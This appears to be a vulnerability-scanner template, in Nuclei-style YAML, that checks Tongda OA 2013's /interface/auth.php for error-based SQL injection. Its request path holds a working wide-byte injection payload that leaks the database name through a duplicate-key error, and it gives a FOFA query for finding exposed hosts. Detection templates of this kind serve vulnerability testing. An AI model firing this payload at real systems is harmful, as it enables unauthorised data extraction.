http:
    - matchers:
        - status:
            - 200
          type: status
        - condition: and
          part: body
          type: word
          words:
            - '错误#1062:'
            - 'SQL语句:'
            - :td_oa:1
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/interface/auth.php?&PASSWORD=1&USER_ID=%df%27 and (select 1 from (select count(*),concat((select concat(0x3a,(select database()) ,0x3a) from user limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23'
id: tongda-oa-interface-auth-sqli
info:
    author: linuxlz
    description: 通达OA2013 /interface/auth.php报错注入
    metadata:
        fofa-query: Office Anywhere 2013
        veified: true
    name: 通达OA2013 /interface/auth.php报错注入
    reference:
        - https://mp.weixin.qq.com/s/6ajtYnyBSzcZrATQp_0i5A
    severity: high
    tags:
        - tongda
        - 通达oa
